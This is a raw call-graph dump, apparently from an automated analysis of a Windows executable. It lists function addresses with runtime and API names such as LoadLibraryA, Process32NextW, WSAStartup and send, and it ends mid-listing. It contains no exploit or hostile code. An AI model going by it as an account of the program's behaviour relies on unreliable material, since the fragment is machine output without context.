GetSystemTimeAsFileTime 103188->103189 103190 22cdb3 103189->103190 103191 22cdc8 103190->103191 103192 22cddd 103190->103192 103193 2028ca _free 47 API calls 103191->103193 103194 22ce42 103192->103194 103195 22cde3 103192->103195 103197 22cdce 103193->103197 103196 2028ca _free 47 API calls 103194->103196 103440 22c251 103195->103440 103202 22cd07 103196->103202 103199 2028ca _free 47 API calls 103197->103199 103199->103202 103201 2028ca _free 47 API calls 103201->103202 103202->103062 103203 1e3e39 103202->103203 103204 1e3e43 103203->103204 103206 1e3e4a 103203->103206 103205 204274 __fcloseall 82 API calls 103204->103205 103205->103206 103207 1e3e6a FreeLibrary 103206->103207 103208 1e3e59 103206->103208 103207->103208 103208->103062 103258 1e3f20 103209->103258 103212 1e3f85 103214 1e3f8d FreeLibrary 103212->103214 103215 1e3f96 103212->103215 103214->103215 103216 204129 103215->103216 103266 20413e 103216->103266 103218 1e3fba 103218->103149 103218->103150 103345 1e3eb3 103219->103345 103222 1e3ea8 FreeLibrary 103223 1e3eb1 103222->103223 103226 1e4010 103223->103226 103225 1e3e9f 103225->103222 103225->103223 103227 20010a 48 API calls 103226->103227 103228 1e4025 103227->103228 103353 1e4bce 103228->103353 103230 1e4031 _memmove 103231 1e406c 103230->103231 103233 1e4129 103230->103233 103234 1e4161 103230->103234 103232 1e41cb 57 API calls 103231->103232 103238 1e4075 103232->103238 103356 1e31f2 CreateStreamOnHGlobal 103233->103356 103367 22d03f 92 API calls 103234->103367 103237 1e417d 64 API calls 103237->103238 103238->103237 103240 1e4109 103238->103240 103241 255794 103238->103241 103362 1e41a7 103238->103362 103240->103158 103242 1e41a7 82 API calls 103241->103242 103243 2557a8 103242->103243 103244 1e417d 64 API calls 103243->103244 103244->103240 103246 1e418f 103245->103246 103247 25587d 103245->103247 103391 2044ae 103246->103391 103250 22c846 103411 22c6a0 103250->103411 103252 22c85c 103252->103165 103254 1e41da 103253->103254 103255 2558bf 103253->103255 103416 204af5 103254->103416 103257 1e41e2 103257->103167 103262 1e3f32 103258->103262 103261 1e3f08 LoadLibraryA 6C1F6DE0 103261->103212 103263 1e3f28 103262->103263 103264 1e3f3b LoadLibraryA 103262->103264 103263->103212 103263->103261 103264->103263 103265 1e3f4c 6C1F6DE0 103264->103265 103265->103263 103269 20414a type_info::_Type_info_dtor 103266->103269 103267 20415d 103314 20889e 47 API calls __getptd_noexit 103267->103314 103269->103267 103270 20418e 103269->103270 103285 20f278 103270->103285 103271 204162 103315 207aa0 8 API calls __wmakepath_s 103271->103315 103274 204193 103275 2041a9 103274->103275 103276 20419c 103274->103276 103278 2041d3 103275->103278 103279 2041b3 103275->103279 103316 20889e 47 API calls __getptd_noexit 103276->103316 103299 20f390 103278->103299 103317 20889e 47 API calls __getptd_noexit 103279->103317 103284 20416d type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 103284->103218 103286 20f284 type_info::_Type_info_dtor 103285->103286 103287 208984 __lock 47 API calls 103286->103287 103288 20f292 103287->103288 103289 20f309 103288->103289 103296 208a0c __mtinitlocknum 47 API calls 103288->103296 103297 20f302 103288->103297 103322 205ade 48 API calls __lock 103288->103322 103323 205b48 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 103288->103323 103324 207660 47 API calls std::exception::_Copy_str 103289->103324 103292 20f310 103294 20f31f InitializeCriticalSectionAndSpinCount RtlEnterCriticalSection 103292->103294 103292->103297 103293 20f37c type_info::_Type_info_dtor 103293->103274 103294->103297 103296->103288 103319 20f387 103297->103319 103300 20f3b0 __wopenfile 103299->103300 103301 20f3ca 103300->103301 103313 20f585 103300->103313 103331 20247b 59 API calls 3 library calls 103300->103331 103329 20889e 47 API calls __getptd_noexit 103301->103329 103303 20f3cf 103330 207aa0 8 API calls __wmakepath_s 103303->103330 103305 2041de 103318 204200 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 103305->103318 103306 20f5e8 103326 217179 103306->103326 103309 20f57e 103309->103313 103332 20247b 59 API calls 3 library calls 103309->103332 103311 20f59d 103311->103313 103333 20247b 59 API calls 3 library calls 103311->103333 103313->103301 103313->103306 103314->103271 103315->103284 103316->103284 103317->103284 103318->103284 103325 208ae8 RtlLeaveCriticalSection 103319->103325 103321 20f38e 103321->103293 103322->103288 103323->103288 103324->103292 103325->103321 103334 216961 103326->103334 103328 217192 103328->103305 103329->103303 103330->103305 103331->103309 103332->103311 103333->103313 103336 21696d type_info::_Type_info_dtor 103334->103336 103335 21697f 103337 20889e __lseek_nolock 47 API calls 103335->103337 103336->103335 103338 2169b6 103336->103338 103339 216984 103337->103339 103340 216a28 __wsopen_helper 109 API calls 103338->103340 103341 207aa0 __wmakepath_s 8 API calls 103339->103341 103342 2169d3 103340->103342 103344 21698e type_info::_Type_info_dtor 103341->103344 103343 2169fc __wsopen_helper RtlLeaveCriticalSection 103342->103343 103343->103344 103344->103328 103349 1e3ec5 103345->103349 103348 1e3ef0 LoadLibraryA 6C1F6DE0 103348->103225 103350 1e3e91 103349->103350 103351 1e3ece LoadLibraryA 103349->103351 103350->103225 103350->103348 103351->103350 103352 1e3edf 6C1F6DE0 103351->103352 103352->103350 103354 20010a 48 API calls 103353->103354 103355 1e4be0 103354->103355 103355->103230 103357 1e320c FindResourceExW 103356->103357 103358 1e3229 103356->103358 103357->103358 103359 2557d3 LoadResource 103357->103359 103358->103231 103359->103358 103360 2557e8 SizeofResource 103359->103360 103360->103358 103361 2557fc LockResource 103360->103361 103361->103358 103363 25589d 103362->103363 103364 1e41b6 103362->103364 103368 20471d 103364->103368 103366 1e41c4 103366->103238 103367->103231 103369 204729 type_info::_Type_info_dtor 103368->103369 103370 204737 103369->103370 103372 20475d 103369->103372 103381 20889e 47 API calls __getptd_noexit 103370->103381 103383 205a9f 103372->103383 103374 20473c 103382 207aa0 8 API calls __wmakepath_s 103374->103382 103375 204763 103389 20468e 80 API calls 4 library calls 103375->103389 103378 204772 103390 204794 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 103378->103390 103380 204747 type_info::_Type_info_dtor 103380->103366 103381->103374 103382->103380 103384 205ad1 RtlEnterCriticalSection 103383->103384 103385 205aaf 103383->103385 103386 205ac7 103384->103386 103385->103384 103387 205ab7 103385->103387 103386->103375 103388 208984 __lock 47 API calls 103387->103388 103388->103386 103389->103378 103390->103380 103394 2044c9 103391->103394 103393 1e41a0 103393->103250 103395 2044d5 type_info::_Type_info_dtor 103394->103395 103396 204510 type_info::_Type_info_dtor 103395->103396 103397 204518 103395->103397 103398 2044eb _memset 103395->103398 103396->103393 103399 205a9f __lock_file 48 API calls 103397->103399 103407 20889e 47 API calls __getptd_noexit 103398->103407 103400 20451e 103399->103400 103409 2042eb 62 API calls 5 library calls 103400->103409 103402 204505 103408 207aa0 8 API calls __wmakepath_s 103402->103408 103405 204534 103410 204552 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 103405->103410 103407->103402 103408->103396 103409->103405 103410->103396 103414 2040da GetSystemTimeAsFileTime 103411->103414 103413 22c6af 103413->103252 103415 204108 __aulldiv 103414->103415 103415->103413 103417 204b01 type_info::_Type_info_dtor 103416->103417 103418 204b24 103417->103418 103419 204b0f 103417->103419 103421 205a9f __lock_file 48 API calls 103418->103421 103430 20889e 47 API calls __getptd_noexit 103419->103430 103423 204b2a 103421->103423 103422 204b14 103431 207aa0 8 API calls __wmakepath_s 103422->103431 103432 20479c 55 API calls 6 library calls 103423->103432 103426 204b35 103433 204b55 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 103426->103433 103428 204b47 103429 204b1f type_info::_Type_info_dtor 103428->103429 103429->103257 103430->103422 103431->103429 103432->103426 103433->103428 103439 22ce6d __tzset_nolock _wcscmp 103434->103439 103435 1e417d 64 API calls 103435->103439 103436 22cd03 103436->103173 103436->103202 103437 22c846 GetSystemTimeAsFileTime 103437->103439 103438 1e41a7 82 API calls 103438->103439 103439->103435 103439->103436 103439->103437 103439->103438 103441 22c26a 103440->103441 103442 22c25c 103440->103442 103444 22c2af 103441->103444 103445 204129 116 API calls 103441->103445 103464 22c273 103441->103464 103443 204129 116 API calls 103442->103443 103443->103441 103471 22c4d4 64 API calls 3 library calls 103444->103471 103446 22c294 103445->103446 103446->103444 103448 22c29d 103446->103448 103448->103464 103481 204274 103448->103481 103449 22c2f3 103450 22c2f7 103449->103450 103451 22c318 103449->103451 103454 22c304 103450->103454 103456 204274 __fcloseall 82 API calls 103450->103456 103472 22c0d1 103451->103472 103457 204274 __fcloseall 82 API calls 103454->103457 103454->103464 103456->103454 103457->103464 103458 22c346 103494 22c376 89 API calls 103458->103494 103459 22c326 103461 22c333 103459->103461 103463 204274 __fcloseall 82 API calls 103459->103463 103461->103464 103466 204274 __fcloseall 82 API calls 103461->103466 103462 22c34d 103495 22c450 103462->103495 103463->103461 103464->103201 103466->103464 103468 22c361 103468->103464 103470 204274 __fcloseall 82 API calls 103468->103470 103469 204274 __fcloseall 82 API calls 103469->103468 103470->103464 103471->103449 103473 2045ec std::exception::_Copy_str 47 API calls 103472->103473 103474 22c0e0 103473->103474 103475 2045ec std::exception::_Copy_str 47 API calls 103474->103475 103476 22c0f4 103475->103476 103477 2045ec std::exception::_Copy_str 47 API calls 103476->103477 103478 22c108 103477->103478 103479 22c450 47 API calls 103478->103479 103480 22c11b 103478->103480 103479->103480 103480->103458 103480->103459 103482 204280 type_info::_Type_info_dtor 103481->103482 103483 204294 103482->103483 103484 2042ac 103482->103484 103519 20889e 47 API calls __getptd_noexit 103483->103519 103486 205a9f __lock_file 48 API calls 103484->103486 103491 2042a4 type_info::_Type_info_dtor 103484->103491 103488 2042be 103486->103488 103487 204299 103520 207aa0 8 API calls __wmakepath_s 103487->103520 103503 204208 103488->103503 103491->103464 103494->103462 103496 22c45d 103495->103496 103499 22c463 103495->103499 103497 2028ca _free 47 API calls 103496->103497 103497->103499 103498 22c474 103501 22c354 103498->103501 103502 2028ca _free 47 API calls 103498->103502 103499->103498 103500 2028ca _free 47 API calls 103499->103500 103500->103498 103501->103468 103501->103469 103502->103501 103504 204217 103503->103504 103505 20422b 103503->103505 103562 20889e 47 API calls __getptd_noexit 103504->103562 103507 204227 103505->103507 103522 203914 103505->103522 103521 2042e3 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 103507->103521 103508 20421c 103563 207aa0 8 API calls __wmakepath_s 103508->103563 103515 204245 103539 20f782 103515->103539 103517 20424b 103517->103507 103518 2028ca _free 47 API calls 103517->103518 103518->103507 103519->103487 103520->103491 103521->103491 103523 203927 103522->103523 103527 20394b 103522->103527 103524 2035c3 __filbuf 47 API calls 103523->103524 103523->103527 103525 203944 103524->103525 103564 20bd14 77 API calls 6 library calls 103525->103564 103528 20f8e6 103527->103528 103529 20f8f3 103528->103529 103531 20423f 103528->103531 103530 2028ca _free 47 API calls 103529->103530 103529->103531 103530->103531 103532 2035c3 103531->103532 103533 2035e2 103532->103533 103534 2035cd 103532->103534 103533->103515 103565 20889e 47 API calls __getptd_noexit 103534->103565 103536 2035d2 103566 207aa0 8 API calls __wmakepath_s 103536->103566 103538 2035dd 103538->103515 103540 20f78e type_info::_Type_info_dtor 103539->103540 103541 20f796 103540->103541 103542 20f7ae 103540->103542 103591 20886a 47 API calls __getptd_noexit 103541->103591 103543 20f82b 103542->103543 103548 20f7d8 103542->103548 103595 20886a 47 API calls __getptd_noexit 103543->103595 103546 20f79b 103592 20889e 47 API calls __getptd_noexit 103546->103592 103547 20f830 103596 20889e 47 API calls __getptd_noexit 103547->103596 103567 20b6a0 103548->103567 103550 20f7a3 type_info::_Type_info_dtor 103550->103517 103553 20f838 103597 207aa0 8 API calls __wmakepath_s 103553->103597 103554 20f7de 103556 20f7f1 103554->103556 103557 20f7fc 103554->103557 103576 20f84c 103556->103576 103593 20889e 47 API calls __getptd_noexit 103557->103593 103560 20f7f7 103594 20f823 RtlLeaveCriticalSection __unlock_fhandle 103560->103594 103562->103508 103563->103507 103564->103527 103565->103536 103566->103538 103568 20b6ac type_info::_Type_info_dtor 103567->103568 103569 20b6f9 RtlEnterCriticalSection 103568->103569 103570 208984 __lock 47 API calls 103568->103570 103571 20b71f type_info::_Type_info_dtor 103569->103571 103572 20b6d0 103570->103572 103571->103554 103573 20b6db InitializeCriticalSectionAndSpinCount 103572->103573 103574 20b6ed 103572->103574 103573->103574 103575 20b723 ___lock_fhandle RtlLeaveCriticalSection 103574->103575 103575->103569 103577 20b957 __close_nolock 47 API calls 103576->103577 103580 20f85a 103577->103580 103578 20f8b0 103579 20b8d1 __free_osfhnd 48 API calls 103578->103579 103584 20f8b8 103579->103584 103580->103578 103581 20b957 __close_nolock 47 API calls 103580->103581 103590 20f88e 103580->103590 103585 20f885 103581->103585 103582 20b957 __close_nolock 47 API calls 103586 20f89a CloseHandle 103582->103586 103583 20f8da 103583->103560 103584->103583 103587 20887d __dosmaperr 47 API calls 103584->103587 103588 20b957 __close_nolock 47 API calls 103585->103588 103586->103578 103589 20f8a6 GetLastError 103586->103589 103587->103583 103588->103590 103589->103578 103590->103578 103590->103582 103591->103546 103592->103550 103593->103560 103594->103550 103595->103547 103596->103553 103597->103550 103598->103073 103599->103079 103600->103076 103601->103099 103602->103101 103603->103097 103604->103105 103605->103111 103606->103124 103607->103120 103609 1ed828 _memmove 103608->103609 103610 1ed815 103608->103610 103609->103136 103610->103609 103611 20010a 48 API calls 103610->103611 103611->103609 103613 254aa5 GetFullPathNameW 103612->103613 103614 1e31c7 103612->103614 103616 254abd 103613->103616 103669 1e3bcf 103614->103669 103617 1e31cd GetFullPathNameW 103618 1e31e7 103617->103618 103618->102934 103620 1e3a8b SHGetDesktopFolder 103619->103620 103623 1e3ade 103619->103623 103621 1e3a99 103620->103621 103620->103623 103622 1e3ac8 SHGetPathFromIDListW 103621->103622 103621->103623 103622->103623 103623->102937 103625 1e3ba9 103624->103625 103631 1e3b72 103624->103631 103626 201bc7 _W_store_winword 59 API calls 103625->103626 103629 2533e5 103625->103629 103625->103631 103626->103625 103627 1e3bcf 48 API calls 103628 1e3b7d 103627->103628 103673 1e197e 103628->103673 103631->103627 103633 1e197e 48 API calls 103634 1e3b9f 103633->103634 103635 1e3dcb 103634->103635 103636 1e3f9b 135 API calls 103635->103636 103637 1e3def 103636->103637 103638 2539f9 103637->103638 103640 1e3f9b 135 API calls 103637->103640 103639 22cc82 121 API calls 103638->103639 103641 253a0e 103639->103641 103642 1e3e02 103640->103642 103643 253a12 103641->103643 103644 253a2f 103641->103644 103642->103638 103645 1e3e0a 103642->103645 103646 1e3e39 83 API calls 103643->103646 103647 20010a 48 API calls 103644->103647 103648 1e3e16 103645->103648 103649 253a1a 103645->103649 103646->103649 103668 253a74 Mailbox 103647->103668 103703 1ebdf0 162 API calls 8 library calls 103648->103703 103704 22757b 86 API calls _wprintf 103649->103704 103652 253a28 103652->103644 103653 1e3e2e 103653->102939 103665 1ecaee 48 API calls 103665->103668 103668->103665 103670 1e3bd9 __wsetenvp 103669->103670 103671 20010a 48 API calls 103670->103671 103672 1e3bee _wcscpy 103671->103672 103672->103617 103674 1e1990 103673->103674 103678 1e19af _memmove 103673->103678 103677 20010a 48 API calls 103674->103677 103675 20010a 48 API calls 103676 1e19c6 103675->103676 103676->103633 103677->103678 103678->103675 103703->103653 103704->103652 103708 1ea72c 103707->103708 103713 1ea848 103707->103713 103709 20010a 48 API calls 103708->103709 103708->103713 103710 1ea753 103709->103710 103711 20010a 48 API calls 103710->103711 103717 1ea7c5 103711->103717 103713->102944 103715 1ea870 48 API calls 103715->103717 103716 1eb6d0 48 API calls 103716->103717 103717->103713 103717->103715 103717->103716 103720 1eace0 90 API calls 2 library calls 103717->103720 103721 22a3ee 48 API calls 103717->103721 103718->102946 103719->102948 103720->103717 103721->103717 103723 1e31a2 LoadImageW 103722->103723 103724 254ad8 EnumResourceNamesW 103722->103724 103725 1e3118 RegisterClassExW 103723->103725 103724->103725 103726 1e2f58 GetSysColorBrush RegisterClassExW RegisterClipboardFormatW 103725->103726 103727 1e2fe9 LoadIconW 103726->103727 103729 1e301e 103727->103729 103729->102964 103731 1ee80f 103730->103731 103732 1ee7fd 103730->103732 103998 22d520 85 API calls 4 library calls 103731->103998 103967 1edcd0 103732->103967 103734 1ee806 103734->103025 103736 2598e8 103736->103736 103738 1eea20 103737->103738 103739 1efa40 405 API calls 103738->103739 103743 1eea89 103738->103743 103741 259919 103739->103741 103740 2599bc 104009 22d520 85 API calls 4 library calls 103740->104009 103741->103743 104006 22d520 85 API calls 4 library calls 103741->104006 103747 1ed3d2 48 API calls 103743->103747 103768 1eeb18 103743->103768 103774 1eecd7 Mailbox 103743->103774 103744 1ed3d2 48 API calls 103746 259997 103744->103746 104008 201b2a 52 API calls __cinit 103746->104008 103749 259963 103747->103749 104007 201b2a 52 API calls __cinit 103749->104007 103750 1ed380 55 API calls 103750->103774 103752 259d70 104018 23e2fb 405 API calls Mailbox 103752->104018 103754 259e49 104023 22d520 85 API calls 4 library calls 103754->104023 103755 1efa40 405 API calls 103755->103774 103756 22d520 85 API calls 103756->103774 103757 259dc2 104020 22d520 85 API calls 4 library calls 103757->104020 103758 259ddf 104021 23c235 405 API calls Mailbox 103758->104021 103762 1e342c 48 API calls 103762->103774 103766 259df7 103786 1eef0c Mailbox 103766->103786 104022 22d520 85 API calls 4 library calls 103766->104022 103767 1f14a0 48 API calls 103767->103774 103768->103744 103768->103774 103770 1ef56f 103770->103786 104019 22d520 85 API calls 4 library calls 103770->104019 103772 1ed805 48 API calls 103772->103774 103773 259a3c 104012 23d154 48 API calls 103773->104012 103774->103740 103774->103750 103774->103752 103774->103754 103774->103755 103774->103756 103774->103757 103774->103758 103774->103762 103774->103767 103774->103770 103774->103772 103774->103773 103774->103786 104010 22a3ee 48 API calls 103774->104010 104011 23ede9 405 API calls 103774->104011 104016 21a599 InterlockedDecrement 103774->104016 104017 23f4df 405 API calls 103774->104017 103776 259a48 103778 259a56 103776->103778 103779 259a9b 103776->103779 104013 22a485 48 API calls 103778->104013 103782 259a91 Mailbox 103779->103782 104014 22afce 48 API calls 103779->104014 103780 1efa40 405 API calls 103780->103786 103782->103780 103784 259ad8 103786->103025 103788 1f469f 103787->103788 103789 1f4537 103787->103789 103792 1ecaee 48 API calls 103788->103792 103790 257820 103789->103790 103791 1f4543 103789->103791 104190 23e713 405 API calls Mailbox 103790->104190 104024 1f4040 103791->104024 103795 1f45e4 Mailbox 103792->103795 104039 22efcd 103795->104039 104073 241f19 103795->104073 104076 236fc3 103795->104076 104079 22dce9 103795->104079 104084 1e50ec 103795->104084 104088 231080 103795->104088 104091 24352a 103795->104091 104170 2395af WSAStartup 103795->104170 104172 239500 103795->104172 104181 1ff55e 103795->104181 103796 1f4559 103796->103795 103797 1f4639 Mailbox 103796->103797 103798 25782c 103796->103798 103797->103025 103798->103797 104191 22d520 85 API calls 4 library calls 103798->104191 104600 1ea9a0 103810->104600 103812 1f36e7 103813 1f3778 103812->103813 103814 25a269 103812->103814 103875 1f3aa8 103812->103875 104622 1fbc04 85 API calls 103813->104622 104627 22d520 85 API calls 4 library calls 103814->104627 103818 25a68d 103818->103875 104642 22d520 85 API calls 4 library calls 103818->104642 103820 1f3793 103820->103818 103849 1f396b Mailbox _memmove 103820->103849 103820->103875 104605 1e10e8 103820->104605 103824 25a289 103828 1ed2d2 53 API calls 103824->103828 103868 25a3e9 103824->103868 103825 25a583 103827 1efa40 405 API calls 103825->103827 103826 25a45c 104636 22d520 85 API calls 4 library calls 103826->104636 103837 1f399f 103870 1ec935 48 API calls 103837->103870 103871 1f39c0 103837->103871 103844 25a5e6 104640 22d520 85 API calls 4 library calls 103844->104640 103845 1efa40 405 API calls 103845->103849 103849->103824 103849->103825 103849->103826 103849->103837 103849->103844 103849->103845 103851 1fbc5c 48 API calls 103849->103851 103861 1ed89e 50 API calls 103849->103861 103869 20010a 48 API calls 103849->103869 103849->103875 104623 1ed500 53 API calls __cinit 103849->104623 104624 1ed420 53 API calls 103849->104624 104625 1fbaef 48 API calls _memmove 103849->104625 104637 23d21a 81 API calls Mailbox 103849->104637 104638 2289e0 53 API calls 103849->104638 104639 1ed772 55 API calls 103849->104639 103851->103849 103861->103849 103869->103849 103870->103871 103871->103875 103879 1f3ab5 Mailbox 103875->103879 104626 22d520 85 API calls 4 library calls 103875->104626 103879->103025 103881 25ee11 103880->103881 103882 1ff390 103880->103882 103883 25ee46 103881->103883 103884 25ee28 TranslateAcceleratorW 103881->103884 103882->103025 103884->103882 103886 1fed2c 103885->103886 103888 1fed34 103885->103888 103886->103025 103887 1fed5e IsDialogMessageW 103887->103886 103887->103888 103888->103886 103888->103887 103889 25ebec GetClassLongW 103888->103889 103889->103887 103889->103888 103890->103025 103891->102977 103892->102971 103893->102976 103894->103025 103895->103025 103896->103020 103897->103020 103898->103020 103900 1efa60 103899->103900 103936 1efa8e Mailbox _memmove 103899->103936 103901 20010a 48 API calls 103900->103901 103901->103936 103902 1f105e 103903 1ec935 48 API calls 103902->103903 103928 1efbf1 Mailbox 103903->103928 103904 1f0119 105098 22d520 85 API calls 4 library calls 103904->105098 103907 1f0dee 103914 1ed89e 50 API calls 103907->103914 103909 1f1063 105097 22d520 85 API calls 4 library calls 103909->105097 103910 201b2a 52 API calls __cinit 103910->103936 103911 1ec935 48 API calls 103911->103936 103912 1f0dfa 103917 1ed89e 50 API calls 103912->103917 103913 25b772 105099 22d520 85 API calls 4 library calls 103913->105099 103914->103912 103915 20010a 48 API calls 103915->103936 103919 1f0e83 103917->103919 103923 1ecaee 48 API calls 103919->103923 103920 1ed3d2 48 API calls 103920->103936 103922 25b7d2 103931 1f10f1 Mailbox 103923->103931 103926 1f1230 103926->103928 105096 22d520 85 API calls 4 library calls 103926->105096 103928->103025 103929 1efa40 405 API calls 103929->103936 105095 22d520 85 API calls 4 library calls 103931->105095 103933 21a599 InterlockedDecrement 103933->103936 103934 25b583 105094 22d520 85 API calls 4 library calls 103934->105094 103936->103902 103936->103904 103936->103907 103936->103909 103936->103910 103936->103911 103936->103912 103936->103913 103936->103915 103936->103919 103936->103920 103936->103926 103936->103928 103936->103929 103936->103931 103936->103933 103936->103934 103952 241f19 129 API calls 103936->103952 104645 1ef6d0 103936->104645 104717 2410e5 103936->104717 104723 238065 GetCursorPos GetForegroundWindow 103936->104723 104737 1e50a3 103936->104737 104742 24804e 103936->104742 104756 24798d 103936->104756 104761 240bfa 103936->104761 104764 1ff461 103936->104764 104802 23013f 103936->104802 104815 2392c0 103936->104815 104833 2417aa 103936->104833 104838 23936f 103936->104838 104866 239122 103936->104866 104880 2430ad 103936->104880 104929 1e81c6 103936->104929 104999 1fef0d 103936->104999 105042 1ff03e 103936->105042 105045 23b74b VariantInit 103936->105045 105086 1fdd84 103936->105086 105089 1f1620 59 API calls Mailbox 103936->105089 105090 23ee52 81 API calls 2 library calls 103936->105090 105091 23ef9d 89 API calls Mailbox 103936->105091 105092 22b020 48 API calls 103936->105092 105093 23e713 405 API calls Mailbox 103936->105093 103952->103936 103956->103025 103957->103020 103958->103020 103959->103020 105614 2279c2 103960->105614 103962 227021 CloseHandle 103962->103020 103963 226fa4 Process32NextW 103963->103962 103965 226fa0 _wcscat 103963->103965 103964 20297d __wsplitpath 47 API calls 103964->103965 103965->103962 103965->103963 103965->103964 103966 201bc7 _W_store_winword 59 API calls 103965->103966 103966->103965 103968 1efa40 405 API calls 103967->103968 103980 1edd0f _memmove 103968->103980 103969 258dbe 104005 22d520 85 API calls 4 library calls 103969->104005 103971 258ddc 103971->103971 103972 1edd70 103972->103734 103973 1ee12b Mailbox 103975 20010a 48 API calls 103973->103975 103974 1ee051 103976 1ee066 103974->103976 103977 258daf 103974->103977 103989 1edecb _memmove 103975->103989 103979 20010a 48 API calls 103976->103979 104004 23d1da 50 API calls 103977->104004 103991 1edf64 103979->103991 103980->103969 103980->103972 103980->103973 103981 20010a 48 API calls 103980->103981 103982 1edeb7 103980->103982 103993 1edf29 103980->103993 103981->103980 103982->103973 103985 1edec4 103982->103985 103983 20010a 48 API calls 103984 1edef6 103983->103984 103984->103993 103999 1f4320 405 API calls 103984->103999 103987 20010a 48 API calls 103985->103987 103986 258d9e 104003 22d520 85 API calls 4 library calls 103986->104003 103987->103989 103989->103983 103989->103984 103989->103993 103991->103734 103993->103974 103993->103986 103993->103991 103994 258d76 103993->103994 103996 258d51 103993->103996 104000 1e5322 405 API calls 103993->104000 104002 22d520 85 API calls 4 library calls 103994->104002 104001 22d520 85 API calls 4 library calls 103996->104001 103998->103736 103999->103993 104000->103993 104001->103991 104002->103991 104003->103991 104004->103969 104005->103971 104006->103743 104007->103768 104008->103774 104009->103786 104010->103774 104011->103774 104012->103776 104013->103782 104014->103784 104016->103774 104017->103774 104018->103770 104019->103786 104020->103786 104021->103766 104022->103786 104023->103786 104025 25787b 104024->104025 104028 1f406c 104024->104028 104193 22d520 85 API calls 4 library calls 104025->104193 104027 25788c 104194 22d520 85 API calls 4 library calls 104027->104194 104028->104027 104035 1f40a6 _memmove 104028->104035 104031 20010a 48 API calls 104031->104035 104032 1f41f1 104032->103796 104033 1efa40 405 API calls 104033->104035 104034 1f4185 104034->103796 104035->104031 104035->104033 104035->104034 104036 1f4175 104035->104036 104037 2578d8 104035->104037 104036->104034 104192 23d21a 81 API calls Mailbox 104036->104192 104195 22d520 85 API calls 4 library calls 104037->104195 104196 1e84a6 104039->104196 104041 22eff2 104216 2278ad GetFullPathNameW 104041->104216 104244 2423c5 104073->104244 104077 1e84a6 80 API calls 104076->104077 104078 236fd6 SetWindowTextW 104077->104078 104078->103797 104080 1e84a6 80 API calls 104079->104080 104081 22dcfc 104080->104081 104346 226d6d 104081->104346 104085 1e50f6 104084->104085 104086 1e5105 104084->104086 104085->103797 104086->104085 104087 1e510a CloseHandle 104086->104087 104087->104085 104358 2322e5 104088->104358 104092 1ed3d2 48 API calls 104091->104092 104093 24354a 104092->104093 104094 1ed3d2 48 API calls 104093->104094 104095 243553 104094->104095 104096 1ed3d2 48 API calls 104095->104096 104171 2395e0 104170->104171 104171->103797 104173 1ecdb4 48 API calls 104172->104173 104174 239515 104173->104174 104175 22be47 50 API calls 104174->104175 104176 239522 104175->104176 104177 23952f send 104176->104177 104182 1ecdb4 48 API calls 104181->104182 104183 1ff572 104182->104183 104184 2575d1 Sleep 104183->104184 104185 1ff57a timeGetTime 104183->104185 104186 1ecdb4 48 API calls 104185->104186 104190->103798 104191->103797 104192->104032 104193->104027 104194->104034 104195->104034 104197 1e84be 104196->104197 104214 1e84ba 104196->104214 104198 255494 104197->104198 104199 1e84d2 104197->104199 104200 255592 __i64tow 104197->104200 104208 1e84ea __itow Mailbox _wcscpy 104197->104208 104201 25549d 104198->104201 104202 25557a 104198->104202 104235 20234b 79 API calls 4 library calls 104199->104235 104207 2554bc 104201->104207 104201->104208 104236 20234b 79 API calls 4 library calls 104202->104236 104205 20010a 48 API calls 104206 1e84f4 104205->104206 104206->104214 104208->104205 104214->104041 104217 1e7e53 48 API calls 104216->104217 104235->104208 104236->104208 104245 2423eb _memset 104244->104245 104246 242452 104245->104246 104247 242428 104245->104247 104251 1ecdb4 48 API calls 104246->104251 104252 242476 104246->104252 104248 1ecdb4 48 API calls 104247->104248 104249 242433 104248->104249 104249->104252 104250 2424b0 104253 242448 104251->104253 104252->104250 104255 1ecdb4 48 API calls 104252->104255 104255->104250 104347 226d8a __wsetenvp 104346->104347 104348 226db3 GetFileAttributesW 104347->104348 104359 232306 104358->104359 104360 232365 104359->104360 104361 23230a 104359->104361 104427 1ff0f3 48 API calls 104360->104427 104362 20010a 48 API calls 104361->104362 104364 232311 104362->104364 104371 232379 104427->104371 104601 1ea9af 104600->104601 104604 1ea9ca 104600->104604 104602 1eb8a7 48 API calls 104601->104602 104603 1ea9b7 CharUpperBuffW 104602->104603 104603->104604 104604->103812 104606 1e10f9 104605->104606 104607 254c5a 104605->104607 104608 20010a 48 API calls 104606->104608 104622->103820 104623->103849 104624->103849 104625->103849 104626->103879 104627->103820 104636->103875 104637->103849 104638->103849 104639->103849 104640->103875 104642->103875 104646 1ef77b 104645->104646 104647 1ef708 104645->104647 104654 25c253 104646->104654 104699 1ef787 104646->104699 104648 1ef712 104647->104648 104650 25c4d5 104647->104650 104653 1ef71c 104648->104653 104669 25c544 104648->104669 104649 1efa40 405 API calls 104649->104699 104651 25c4f4 104650->104651 104652 25c4e2 104650->104652 105128 23c235 405 API calls Mailbox 104651->105128 105100 23f34f 104652->105100 104658 25c6a4 104653->104658 104668 1ef72a 104653->104668 104670 1ef741 104653->104670 105123 22d520 85 API calls 4 library calls 104654->105123 104662 1ec935 48 API calls 104658->104662 104659 25c585 104665 25c5a4 104659->104665 104666 25c590 104659->104666 104660 25c264 104660->103936 104661 25c507 104664 25c50b 104661->104664 104661->104670 104662->104670 105129 22d520 85 API calls 4 library calls 104664->105129 105131 23d154 48 API calls 104665->105131 104671 23f34f 405 API calls 104666->104671 104668->104670 105136 21a599 InterlockedDecrement 104668->105136 104669->104659 104678 25c569 104669->104678 104675 25c7b5 104670->104675 104714 1ef770 Mailbox 104670->104714 105137 23ee52 81 API calls 2 library calls 104670->105137 104671->104670 104673 25c45a 104677 1ec935 48 API calls 104673->104677 104682 25c7eb 104675->104682 105138 23ef9d 89 API calls Mailbox 104675->105138 104676 25c5af 104677->104670 105130 22d520 85 API calls 4 library calls 104678->105130 104679 1ef84a 104685 25c32a 104679->104685 104696 1ef854 104679->104696 104683 1ed89e 50 API calls 104682->104683 104683->104714 105124 1e342c 48 API calls 104685->105124 104686 25c793 104688 1e84a6 80 API calls 104686->104688 104690 25c7c9 104692 1ef8bb 104692->104660 104692->104670 104692->104673 105125 21a599 InterlockedDecrement 104692->105125 105127 23f4df 405 API calls 